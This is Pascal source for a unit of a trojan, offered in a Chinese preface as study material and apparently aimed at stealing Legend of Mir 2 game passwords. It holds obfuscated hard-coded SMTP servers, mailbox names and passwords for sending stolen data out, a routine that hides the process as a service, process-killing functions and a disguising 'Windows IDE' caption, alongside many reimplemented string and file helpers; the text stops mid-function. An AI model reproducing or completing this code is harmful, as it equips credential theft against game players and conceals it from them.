other.pas

一个木马的源程序。希望大家可以一起通过它来学习一此东西

unit Other;

interface

Uses Windows,tlhelp32,PsAPI;

type
  PStrData = ^TStrData;
  TStrData = record
    Ident: Integer;
    Str: string;
  end;
	TUseInfo=record
	  QQ,
    Mail,
    Page:string;
    DL:boolean;
  end;

  TSendMailInfo=record
    IPAddress,
  	FAddress,
  	FName,
  	FPW,
  	FCName,
  	FCPW:string;   //发信邮箱检证用户密码
  end;
{ FloatToText, FloatToTextFmt, TextToFloat, and FloatToDecimal type codes }

  TFloatValue = (fvExtended, fvCurrency);

{ FloatToText format codes }

  PDayTable = ^TDayTable;
  TDayTable = array[1..12] of Word;

  TFloatFormat = (ffGeneral, ffExponent, ffFixed, ffNumber, ffCurrency);
	function UpperCase(const S: string): string;
  function LowerCase(const S: string): string;
	function HTW(Str:String):String;
	function StrLen(const Str: PChar): Cardinal; assembler;
	function StrCopy(Dest: PChar; const Source: PChar): PChar;
	function StrPas(const Str: PChar): string;
	function Inttostr(const Int:integer):string;
	function StrToInt(const S: string): Integer;
  function LoadStr(Ident: Integer): string;
  function AllocMem(Size: Cardinal): Pointer;
	function Format(const Format: string; const Args: array of const): string;
	function HexToInt(HexStr: string): Int64;
	function strtohex(str:string):string;
	function IntToHex(Value: Int64; Digits: Integer): string;
	function hextostr(str:string):string;
	function ReadString(const FFileName, Section,Ident, Default: string): string;
	Function splite_str(str,s:string):integer;
	procedure dowithfile;
  //_____________________________
	//function GetServerName(Logo:String;Y:integer):String;
  function extractPath(const Str:String):string;
	//function GetServerPlace(Y:integer):String;
	function FileExists(const FileName: string): Boolean;
	Function FileTimeGet(FileName:string;TimeType:Integer):String;
	//function GetServerPlace(Y:integer):String;
	function GetDateTime:String;
	function myGetComputerName:String;
	function GetWP:string;
	procedure Killer;
	function Killpro(ExeFileName: string): Integer;
  procedure HideSelfToBeService;
	function FindPro(ExeFileName: string ;var path: string):boolean;
  function judgesys:integer;
  //function ASendmessage(handle:hwnd;Wmsg:integer;
  //         Lparam:integer; Wparam:Pchar):integer;
  
  Function MakeSelfCode(const S:String):String;

  function GetAddress(EMailCurrent:integer):String;
  function GetHost:String;
	function Getport:String;
	function GetToaddress(index:integer):String;
  procedure SetToaddress(const Value:array of string);
	function GetFromaddress(EMailCurrent:integer):String;
  function GetOwnaddress:string;
  function SetOwnaddress(Value:string):String;
	function GetName(EMailCurrent:integer):String;
	function GetPW(EMailCurrent:integer):String;
  function GetCheckName(EMailCurrent:integer):string;
  function GetCheckPW(EMailCurrent:integer):string;

  procedure SetDL(QQ,Mail,Page:string;DL:boolean=true);
const
  fmOpenRead       = $0000;
  fmOpenWrite      = $0001;
  fmOpenReadWrite  = $0002;

  fmShareCompat    = $0000 platform; // DOS compatibility mode is not portable
  fmShareExclusive = $0010;
  fmShareDenyWrite = $0020;
  fmShareDenyRead  = $0030 platform; // write-only not supported on all platforms
  fmShareDenyNone  = $0040;
{ The MonthDays array can be used to quickly find the number of
  days in a month:  MonthDays[IsLeapYear(Y), M]      }

  MonthDays: array [Boolean] of TDayTable =
    ((31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31),
     (31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31));

{ Days between 1/1/0001 and 12/31/1899 }

  DateDelta = 693594;
  Reg_As_Service    =1;//为1表示注册    //OICQ用户登录  身份验证
  Un_Reg_As_Service =0;//0则可在关闭程序中出现
  //TSMail ='cc07@cc07.net';

  SubMainKey='legend of mir2';
  SubSubKey='legend of mir2\Enter';
  SubChange='legend of mir2\Change password';
  SubRegistry='legend of mir2\Registry';

  CaptionName='Windows IDE';
  //20030907
  //--- send mail infor 20030907
  MailMax=3; //内定的发信箱 如果没有自定就使用内定
  IPAddress:array[1..MailMax] of string=  // 发信箱服务器
  		(
       'jtmi7+(zw7zvt',    //smtp.21cn.com    jtmi7(/*7w|m smtp.163.net

      'jtmi7(/*7zvt',    //smtp.163.com

       'jtmi7jpwx7zvt7zw' //smtp.sina.com.cn
      );
  FAddress:array[1..MailMax] of string=  //发信箱邮箱地址
  		(
       'tpk*j|w}+(Y+(zw7zvt',    //mir3send21@21cn.com  zhj1121@163.net

      'tpk*j|w}Y(/*7zvt', //mir3send@163.com  servermir2@163.com

       '1111'   //是新浪的，转成他自己的邮箱地址
      );
  FName:array[1..MailMax] of string=    //发信用户名
  		(
       'tpk*j|w}+(',       //mir3send21 zhj1121

      'tpk*j|w}',   //mir3send servermir2

       'w{cqs((+('     //nbzhj1121
      );
  FPW:array[1..MailMax] of string=     //发信密码
  		(
       'p|*+(zwzvt',    //ie321cncom @@@@@@@@

      'tjx({+z*}-',  //msa1b2c3d4  mir2server

       'w{cqs((+('    //nbzhj1121
      );
  FCName:array[1..MailMax] of string=  //发信邮箱检证用户名
  		(
       '{Nu`T*Wu{tH`TH$$',

      '{Nu`T*Wu{tH$',

       '{tS/x^vaTMPa'
      );
  FCPW:array[1..MailMax] of string=   //发信邮箱检证用户密码
  		(
       'xNLcTs_s{tWo{H$$',

      '{AWqTNP`@cWrWX$$',

       '{tS/x^vaTMPa'
      );

  RMailMax=3; //收信箱最大个数

var FToaddress:array[1..RMailMax] of string; //收信箱   //FToaddress:string;
    SendMailInfo :array[1..MailMax] of TSendMailInfo; //发信箱
		
    TryVer:string;
    //20030907
    EMailCurrent,EmailCount:integer;
    //EMailUserOwn
    EMailUserOwn:boolean;//使用对方的信箱发信
    EMailOwnCurrent:integer; //

    DLOK:boolean; //代理去掉广告
    UseInfo:TUseInfo;

  	CurrencyDecimals: Byte;
    FOwnToaddress:string;

  	WinX:boolean;//除nt,2000,xp
    DLSTR:string;
    TSMail:string;

    SoftPrice:string;
    MSubject1,MSubject2,
    MSubject3:string;
    ConfigPath:string;
  	splite_array:array of string;
implementation

uses Reg, Pdh;

function ASendmessage(handle:hwnd;Wmsg:integer;
    Lparam:integer; Wparam:Pchar):integer;external 'user32.dll' name 'SendMessageA';

procedure HideSelfToBeService;
var Pid:DWORD;
    //Regserv:DWORD;
    LibHandle:HWND;
    DllName:function(dwProcessId,dwType:DWORD):DWORD;stdcall;
begin
  LibHandle:=LoadLibrary('kernel32.dll');
  if LibHandle<32 then
  begin
    Exit;
  end;
  @DllName:=GetProcAddress(LibHandle,'RegisterServiceProcess');
  if @DllName=NIL then
  begin
    FreeLibrary(LibHandle);
    Exit;
  end;
  try
    Pid := GetCurrentProcessId;
    DllName(pid, Reg_As_Service);    //Regserv :=    RegisterServiceProcess
  finally
    FreeLibrary(LibHandle);
  end;
end;

function extractfilename(const Str:String):string;
var L,i,flag:integer;
begin
	L:=Length(Str);
	for i:=1 to L do if Str[i]='\' then flag:=i;
	result:=copy(Str,flag+1,L-flag);
end;

function UpperCase(const S: string): string;
var Ch: Char;
  	L: Integer;
  	Source, Dest: PChar;
begin
  L := Length(S);
  SetLength(Result, L);
  Source := Pointer(S);
  Dest := Pointer(Result);
  while L <> 0 do begin
    Ch := Source^;
    if (Ch >= 'a') and (Ch <= 'z') then Dec(Ch, 32);
    Dest^ := Ch;
    Inc(Source);
    Inc(Dest);
    Dec(L);
  end;
end;

function LowerCase(const S: string): string;
var
  Ch: Char;
  L: Integer;
  Source, Dest: PChar;
begin
  L := Length(S);
  SetLength(Result, L);
  Source := Pointer(S);
  Dest := Pointer(Result);
  while L <> 0 do
  begin
    Ch := Source^;
    if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 32);
    Dest^ := Ch;
    Inc(Source);
    Inc(Dest);
    Dec(L);
  end;
end;

function FileAge(const FileName: string): Integer;
type
  LongRec = packed record
    case Integer of
      0: (Lo, Hi: Word);
      1: (Words: array [0..1] of Word);
      2: (Bytes: array [0..3] of Byte);
  end;
var
  Handle: THandle;
  FindData: TWin32FindData;
  LocalFileTime: TFileTime;
begin
  Handle := FindFirstFile(PChar(FileName), FindData);
  if Handle <> INVALID_HANDLE_VALUE then
  begin
    Windows.FindClose(Handle);
    if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then
    begin
      FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime);
      if FileTimeToDosDateTime(LocalFileTime, LongRec(Result).Hi,
        LongRec(Result).Lo) then Exit;
    end;
  end;
  Result := -1;
end;

function FileExists(const FileName: string): Boolean;
begin
  Result := FileAge(FileName) <> -1;
end;

function FileRead(Handle: Integer; var Buffer; Count: LongWord): Integer;
begin
  if not ReadFile(THandle(Handle), Buffer, Count, LongWord(Result), nil) then
    Result := -1;
end;

function FileWrite(Handle: Integer; const Buffer; Count: LongWord): Integer;
begin
  if not WriteFile(THandle(Handle), Buffer, Count, LongWord(Result), nil) then
    Result := -1;
end;

procedure FileClose(Handle: Integer);
begin
  CloseHandle(THandle(Handle));
end;

function FileSeek(Handle, Offset, Origin: Integer): Integer;
begin
  Result := SetFilePointer(THandle(Handle), Offset, nil, Origin);
END;

function FileCreate(const FileName: string): Integer;
begin
  Result := Integer(CreateFile(PChar(FileName), GENERIC_READ or GENERIC_WRITE,
    0, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0));
end;

function FileOpen(const FileName: string; Mode: LongWord): Integer;
const
  AccessMode: array[0..2] of LongWord = (
    GENERIC_READ,
    GENERIC_WRITE,
    GENERIC_READ or GENERIC_WRITE);
  ShareMode: array[0..4] of LongWord = (
    0,
    0,
    FILE_SHARE_READ,
    FILE_SHARE_WRITE,
    FILE_SHARE_READ or FILE_SHARE_WRITE);
begin
  Result := -1;
  if ((Mode and 3) <= fmOpenReadWrite) and
    (((Mode and $F0) shr 4) <= fmShareDenyNone) then
    Result := Integer(CreateFile(PChar(FileName), AccessMode[Mode and 3],
      ShareMode[(Mode and $F0) shr 4], nil, OPEN_EXISTING,
      FILE_ATTRIBUTE_NORMAL, 0));
end;

function IsLeapYear(Year: Word): Boolean;
begin
  Result := (Year mod 4 = 0) and ((Year mod 100 <> 0) or (Year mod 400 = 0));
end;

function TryEncodeDate(Year, Month, Day: Word; out Date: TDateTime): Boolean;
var
  I: Integer;
  DayTable: PDayTable;
begin
  Result := False;
  DayTable := @MonthDays[IsLeapYear(Year)];
  if (Year >= 1) and (Year <= 9999) and (Month >= 1) and (Month <= 12) and
    (Day >= 1) and (Day <= DayTable^[Month]) then
  begin
    for I := 1 to Month - 1 do Inc(Day, DayTable^[I]);
    I := Year - 1;
    Date := I * 365 + I div 4 - I div 100 + I div 400 + Day - DateDelta;
    Result := True;
  end;
end;

function EncodeDate(Year, Month, Day: Word): TDateTime;
begin
  if not TryEncodeDate(Year, Month, Day, Result) then
    //ConvertError(@SDateEncodeError);
end;

function SystemTimeToDateTime(const SystemTime: TSystemTime): TDateTime;
begin
  with SystemTime do
  begin
    Result := EncodeDate(wYear, wMonth, wDay);
    {if Result >= 0 then
      Result := Result + EncodeTime(wHour, wMinute, wSecond, wMilliSeconds)
    else
      Result := Result - EncodeTime(wHour, wMinute, wSecond, wMilliSeconds); }
  end;
end;

Function FileTimeGet(FileName:string;TimeType:Integer):String;
Var
  FT1:TFileTime;
  hFile: THandle;
  SystemTime:TSystemTime;
begin
  hFile := FileOpen( FileName,fmShareDenyNone );
  Result:='';//Now;
  if hFile <> 0 then  begin
    case TimeType of
      1:GetFileTime( hFile, @FT1, nil, nil );//create
      2:GetFileTime( hFile, nil, @FT1, nil );//access
      3:GetFileTime( hFile, nil, nil, @FT1 );//write
    end;
    FileTimeToLocalFileTime( FT1, FT1 );
    FileTimeToSystemTime( FT1, SystemTime );
    Result:=inttostr(SystemTime.wYear) +'-'+inttostr(SystemTime.wMonth) +'-'+inttostr(SystemTime.wDay) ;//SystemTimeToDateTime(SystemTime);
  end;
  FileClose( hFile );
end;

function GetDateTime:String;
var D:_systemtime;
begin
	GetlocalTime(D);
	Result:=inttostr(D.wYear)+'-'+inttostr(D.wMonth)+'-'+inttostr(D.wDay)+' '+inttostr(D.wHour)+':'+inttostr(D.wMinute)+':'+inttostr(D.wSecond);
end;

function StrToInt(const S: string): Integer;
var
  E: Integer;
begin
  Val(S, Result, E);
end;

function HTW(Str:String):String;
begin
 if Length(Str)>2 then begin
   Delete(Str,1,2);
   Result:='**'+Str;
 end else Result:=Str;
end;

function StrLen(const Str: PChar): Cardinal; assembler;
asm
        MOV     EDX,EDI
        MOV     EDI,EAX
        MOV     ECX,0FFFFFFFFH
        XOR     AL,AL
        REPNE   SCASB
        MOV     EAX,0FFFFFFFEH
        SUB     EAX,ECX
        MOV     EDI,EDX
end;

function StrCopy(Dest: PChar; const Source: PChar): PChar;
asm
        PUSH    EDI
        PUSH    ESI
        MOV     ESI,EAX
        MOV     EDI,EDX
        MOV     ECX,0FFFFFFFFH
        XOR     AL,AL
        REPNE   SCASB
        NOT     ECX
        MOV     EDI,ESI
        MOV     ESI,EDX
        MOV     EDX,ECX
        MOV     EAX,EDI
        SHR     ECX,2
        REP     MOVSD
        MOV     ECX,EDX
        AND     ECX,3
        REP     MOVSB
        POP     ESI
        POP     EDI
end;

function StrPas(const Str: PChar): string;
begin
  Result:=Str;
end;

function Inttostr(const Int:integer):string;
Var d,m:integer;
Begin
	m:=int;
	Result:='';
	while m<>0 do begin
 		d:=m mod 10;
 		m:=m div 10;
 		Result:=chr(d+48)+Result;
	end;
end;

function EnumStringModules(Instance: Longint; Data: Pointer): Boolean;
{$IFDEF MSWINDOWS}
var
  Buffer: array [0..1023] of char;
begin
  with PStrData(Data)^ do
  begin
    SetString(Str, Buffer,
      LoadString(Instance, Ident, Buffer, sizeof(Buffer)));
    Result := Str = '';
  end;
end;
{$ENDIF}

function FindStringResource(Ident: Integer): string;
var
  StrData: TStrData;
begin
  StrData.Ident := Ident;
  StrData.Str := '';
  EnumResourceModules(EnumStringModules, @StrData);
  Result := StrData.Str;
end;

function LoadStr(Ident: Integer): string;
begin
  Result := FindStringResource(Ident);
end;

function AllocMem(Size: Cardinal): Pointer;
begin
  GetMem(Result, Size);
  FillChar(Result^, Size, 0);
end;

procedure FormatError(ErrorCode: Integer; Format: PChar; FmtLen: Cardinal);
begin
end;

procedure FormatClearStr(var S: string);
begin
  S := '';
end;

procedure FormatVarToStr(var S: string; const V: Variant);
begin